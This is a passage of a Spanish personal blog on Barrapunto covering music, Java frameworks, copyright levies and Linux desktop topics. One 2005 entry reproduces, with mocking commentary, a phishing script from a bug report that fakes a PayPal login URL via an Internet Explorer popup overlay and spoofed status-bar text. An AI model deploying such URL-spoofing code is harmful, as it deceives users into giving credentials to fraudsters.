Historias
Slashboxes
Comentarios
 

Login Barrapunto

Login

[ Crear nueva cuenta ]

psykal (10901)

psykal
  (email no mostrado públicam.)
http://psykal.dsland.org/

Down Kill Up Publicidad

Bitácora de psykal (10901)

Jueves, 05 de Junio 2008

psychedelic trance

11:28h.
Energía
Creo que he encontrado en google una puerta a los gemidos de ultratumba y lluvias fluorescentes: google in trance

En todo caso, se trataba de recordar estos nombres...

  MYCEL - PsyCZ - UPE - gEm

y evidentemente, rendirles el correspondiente homenaje: siempre me preguntaré quien es el tal Mycel, debe tener una discografía de hipo. :D

Lo triste es que la pasta que me dejo en cánones va destinada a artistas españoles que nunca escucharé y que los auténticos autores no ven un duro... menos cuando me doy un saltito por Portugal.

BOOM!
Jueves, 10 de Abril 2008

frameworks java

04:04h.
Bitácoras
En un primer momento me las había prometido muy felices tras pequeñas incursiones periféricas en los contenedores de aplicaciones web, cazando furtivamente [servlets], [JSP] y demás pequeñas criaturas.. Pero eramos muchos, y el hambre nos forzaba a adentrarnos cada vez mas en las profundidades de la selva en busca de nuevos trofeos que saciasen nuestro creciente apetito. Todos pusimos nuestra atención en el tupido bosque dentro de una selva, aislada en las tenebrosas tierras de [Java], en las que, como todo el mundo sabe, habitan monstruos de múltiples cabezas que atormentan a los mas jóvenes y ancianos, como el [Jetty] o [Tomcat]. Se intuía que la belleza del [JBoss] solo se podría apreciar realmente tomando cierta perspectiva a aventurándose es las pantanosas tierras que protegen el templo de [J2EE] y era conocido que en las tierras vírgenes que escondía ese bosque encantado (que no encantador) cruzaba un río de aguas tranquilas: el río [Maven].
Corrió por aquel entonces el rumor de que en algún punto había una pradera en la que pastaba una manada de [XML]... y yo, como tantos otros, fui en su búsqueda. Acostumbrado a comer pajaritos y zorros (había poco conejo por aquel entonces) se me hizo la boca agua al contemplar esa mansedumbre en la que se palpaba la robustez que caracteriza a los animales criados en libertad. Algunos pensaron que esa era la ocasión de abandonar la caza y se asentaron en esas verdes praderas para criar [XML] como el que cría [ÑU]s. Salieron todo tipo de variedades como el [XHTML], [XSLT], [XFroms] y demás derivados.
En esos tiempos de abundancia, para los cazadores seguía habiendo zonas amparadas por el [W3C] para, de forma regulada, buscar nuevas formas de vida con las que crear nuevas recetas. Fue por aquel entonces por aquel entonces cuando se legalizaba la caza al [XHR], se otorgaban permisos oficiales para el uso de [Prototype.js] o incluso DWR, y se descubrían las delicias de la aromatizada carne de [Dojo]. Como anécdota personal, y a sabiendas de que el lector puede considerarla poco creíble, comentaré que en esos tiempos, un día corriendo detrás de un [rhino]ceronte, me encontré con un [E4X], especie exótica donde las haya.
Pero, como siempre, llegaron los amantes de la economía de escala quisieron explotar esas circunstancias, y al introducir la cría en procesos industriales, la carne del XML, que hasta ese momento era de lo mas preciado, paso a ser el ingrediente principal de la dieta de los programadores, y no solo eso: en la reconversión muchos pasaron de ser cazadores furtivos a trabajar por un sueldo precario como operadores en una cárnica [struts]. Algunos gourmets, hastiados de los productos industriales, y de la alienación que representa la vida urbana frente a la vida rural, volvían al campo y empezaban a explorar vías alternativas para ganarse el pan... Como la construcción, ya que por aquel entonces todo indicaba que las promotoras, constructoras y demás andamios estarían en racha.
Fue sin duda un periodo de crecimiento: Flamantes promotoras como [RoR] o [GWT] hicieron su agosto. En esa vorágine, hubo una primavera [spring] que dio mucho que hablar. En efecto, con el impulso que estaban teniendo las constructoras, se urbanizaron los entornos del río [maven], en el que se acomodaron aparecieron nuevas formas de vida como la[IoC].
Se verano, se instalaron nuevas arquitecturas como [appfuse], [acegi], [equinox], [tapestry], [trails] y surgieron la [BoC] y [Seam]. Por otro lado, como respuesta al exito de estas nuevas urbanizaciones, surgieron la necesidad de adecuar las infraestructuras como las comunicaciones [JMS] ,transacciones [JTA], reglamentaciones horarias para el uso de los recursos [Quarz], o planes urbanísticos [Terracota], a modelos de crecimiento sostenibles ante la falta de liquidez de entidades bancarias como el [ORM], [JPA],[EJB] tras el duro invierno [hibernate]...

Lunes, 11 de Febrero 2008

Opinion sobre el canon de un militante socialista

05:32h.
Copyfight
Esta mañana se me ocurrio la brillante idea de crear un nuevo usuario para poner en evidenccia el resultado de años de lavado de cerebro que representa la lectura diaria de EL PAIS en las opiniones de un ejemplar canónico de militante del PSOE (mi padre). Pero a la vista que hay un filtro de karma y que sería triste que esta reflexion llegue a portada, reproduzco aqui parte de la entrada:

Después de años leyendo barrapunto, foros y opiniones destacadas del movimiento copyleft, yo ya me he rendido: me considero ya muy viejo para entrar en tediosas polémicas propias de un buen flamewar barrapuntero, que evidentemente ya no es lo que era, del tipo "linux no esta todavía maduro para el uso en escritorio" o las tipicas confusiones interesadas entre libre, gratis y abierto.

A sabiendas de ser un enunciado que puede encajar perfectamente en lo que se denomina trolleada, no olvidemos que es la postura del gobierno: estoy instando a que se cree un buen flame sobre el tema. El mayor coartada del PSOE en este debate ha sido el hecho de que el PP y la extrema derecha hayan abanterado la postura contraria al canon: solo nos faltaria que el PP se ponga a defender tambien la adopcion de S.L. en la administracion.

Por ello creo interesante exponer a escrutinio publico sus firmes convicciones ya que resultan ser fiel reflejo de la opinion del partido.

Cito pues:

La aplicacion del canon es, evidentemente, una victoria de los artistas que no quieren prescindir de sus derechos de autor.


Voy a por las palomitas..
Lunes, 14 de Enero 2008

la batalla final sobre lenguajes de programacion

08:47h.
Humor
"The Last Language War / Language Trolling Post You'll Ever Need To Read (Hopefully)

Moderator: Greetings, and welcome to the First-And-Possibly-Last-Ever Pan-Computer-Programming-Language Conference (FAPLEPCPLC). I am joined on stage tonight by many distinguished, high-profile computer programming languages. Each is highly regarded by its devotees, and I for one look forward to hearing what each has to say."

más en...

http://davidrupp.blogspot.com/2007/10/last-languag e-war-language-trolling.html
Lunes, 27 de Noviembre 2006

Compiz, NV-Geforce2 y AMD 1Gh.. funciona!

01:23h.
Ciencia-Ficción
Y con solo 256Mb de RAM..

El caso es que lo he probado, y me ha gustado.. incluso demasiado! no sé si podré vivir sin el..

Funciona muy fluido, pero lo curioso es que no consigo hacer que glxgears suba por encima de los 400 FPS...

Indagando, parece que es por los drivers de nvidia (1.0-9629), ya que incluso desactivando Composite (y por lo tanto compiz) tampoco suben los FPS.

En todo caso, esto del compiz es un pelotazo y no es solo eye-candy!... animo a todo el mundo a probarlo.

Por cierto.. ¿hacer un port para cygwin?.. ¿ciencia-ficcion?.. o pelotazo?
Martes, 03 de Octubre 2006

SET ezine

01:42h.
Intrusiones
No es noticia.. pero por casualidades lo acabo de recordar..
En plan homenaje:
Saqueadores edicion tecnica n 33 ... ...Más de diez años ya.. hay que ver como pasa el tiempo. desde aqui, un abrazo!
Viernes, 29 de Septiembre 2006

la ser y la sgae...

03:35h.
Copyfight
Despues de un larga ausencia, volvemos al ataque:

1) Un escueto reportaje de la SER sobre el canon...


2) y via escolar: Pocholo y el alcalde de Ortigueira
Toma 500 euros ostia y gastalos! (...) que pago yo joder!
...no tiene desperdicio, parece un vídeo de campaña electoral... este menda en las próximas elecciones arrasa.
Martes, 12 de Julio 2005

ADSL ya.com ... y su recorte del ancho de banda..

10:51h.
Bitácoras
¿Soy el unico que sufre los cuelgues constantes del 3CRADSL72?

Despues de actualizarle el firmware, redireccionarle todos los puertos, etc.. a entrado en fase inestable: ¿un ataque?

Hago un test de velocidad, y resulta que la supuesta duplicación de ancho de banda, se ha convertido en la mitad... de 1024 teoricos, paso a 512 teoricos..

¿soy el unico? ¿o es generalizado?

PS: Vaya, en lo que he tardado en escribir el comentario, ya se ma ha colgado... y lo he tenido que reiniciar.
Lunes, 11 de Julio 2005

El cuerpo del delito...

06:07h.
Bitácoras
En plena busqueda de bugs más o menos actuales, me encuetro en la lista de bugzilla, otro más sobre URL spoofing.. Nada interesante que resaltar, si no es por la cutrez del script-kiddie..


var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+72;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-520;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://www.paypal.com/cgi-bin/webscr?cmd=_l ogin-run\x3C/div>'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {
}


Sumandole esto...



<head>
<body onLoad="window.status='Done';return true">
</body>
<body onMouseOver="window.status='Welcome to PayPal';return true">
</body>



Y a ganar dinero...

El script en cuestion es de lo más desfasado, y solo es válido para cierta version del IE.. lo que no impide que se siga usando... lo cual, teniendo en cuenta los riesgos, significa que debe ser un negocio rentable. ¿O los riesgos no son tantos?

Buscando códigos similares, me encuentro con un script anti parasitos.

http://www.doxdesk.com/script/parasite.js

Es probable que la solucion para los bancos pase por someter al cliente a un "ataque preventivo" para ver si esta infestado de mirones.. jeje

"información útil sobre servicios DNS (al hilo del pharming y el envenenamiento DNS), sistemas de seguridad gestionados (MSS), sistemas de pago, sistemas antifraude (phishing), certificados digitales (infraestructura PKI, SSL) y alguna que otra cosita más."

PS: En otro orden de cosas...

Rhino shell y Rhino compiler

Rhino doc, Scripting Java .. Solo me queda:

Investigar BSF, probar
  runCommand()

Y meterle mano a un parser XML.. y XSLT, con xalan y sus extensiones.

Javalayer.. mp3 para el JMF

Codecs ffmpeg para el JMF

Un extenso artculo sobre RTSP/RTP y JMF

mp3 SPI para el API JavaSound de tritonus

SPI vorbis

un ejemplo simple de RTP sobre el JMF
Jueves, 07 de Julio 2005

techno y politica.. ¿o es religion?

12:55h.
Bitácoras
En este mundo de lógica borrosa, o borrosa lógica, los umbrales tienen mucha importancia a la hora de catalogar al projimo. Creo que me podria hasta parecer positiva la difusion que esta haciendo el "neng" del progressiv si no fuera por la imagen de descerebrado que se le asocia y por la escasa calidad de la musica que le acompaña... En cambio, no me parece del todo acertada la caricaturización de Acebes por los guiñoles: por algún extraño motivo se tiende a asociar techno con ultra derecha, en una entrada en la bitacora de MadraudeR se ha lanzado un mini flame...

porque la gran mayoría de los seguidores de esa "música" siguen tendencias políticas derechistas radicales.

Sé que es una provocación, pero ¿Seré la excepción que confirma la regla?

Sinceramente, el unico denominador común que he encontrado en las raves (en las que yo me he movido) es el culto al bajo y, todo hay que decirlo, cierta pasion desmesurada por la psiconautica... En otros ambientes se sustituye el bajo por el bate y la psiconautica por el consumo a secas.

¿En los estadios? ¿Deporte, ultras y similes futbolisticos?¿Leyendas urbanas y tribus de "bakaletas"?.

  El único componente politico que puedo reconocer en esta musica pude ser el impulso subversivo y revolucionario latente en el bajo y en el uso de sonidos estridentes (existen reacciones organicas instintivas de alerta ante sonidos no reconocibles). La ambigüedad de mi firma deja explicita cierta devocion por efecto catartido que puede tener bailar desaforadamete esta musica: busqueda de estados trascendentales inducidos por el estupor que produce un entorno acustico sintetico, ritmos desbocados combinados con dosis masivas de ondas alfa, resonancia de organos y otros recursos de la musica electroacustica... agúnos (¡no todos!) lo condimentan con substancias psicoactivas.

De derechas es la actitud de cortar el agua en las "discotecas" para "aumentar los beneficios", o poner musica vomitiva "porque eso aumenta el consumo" (sic) o "pinchar" el supertopventasreggeton porque "es lo que le gusta a la gente".

"Con otras ideas tienen otro estilo y frecuentan otros lugares"

Lo progre y de izquierdas es ser rockero y considerar a los "bakaletas" como unos lobotomizados, irse de copas y coca hasta las trancas.. (¿acompañado con el bocadillo de calamares?), pasearse con el djambé (pero no dejar que lo toque nadie, no vaya a ponerte en ridiculo), tocar la guitarra, escuchar a sabina, o a bisbal.. tanto dá: "a mi me gusta la buena musica"... y con unas copas de más, totál!.. a bailar al son de canciones reggeton... tarareando consignas oligofrenicas... y al final, como se ha pasao mezclando, busca una discoteca de chunda chunda para bajar "er subidón"... que mira tú por donde, no es una rave, sino un puticlub donde ponen "dance" (En eso si soy un drastico de mucho cuidado: sin vocecitas!) y las gogos hacen su trabajo, que consiste en poner posturitas sujerentes sobre una tarima... En estas, el sujeto en cuestion interpela a un cliente habitual que sale del estadio y con el que balbucea alguna que otra onomatopeya sobre lo sabrosona que está la gogó... La conclusion que saca es que la gente que escucha esa musica no es muy recomendable.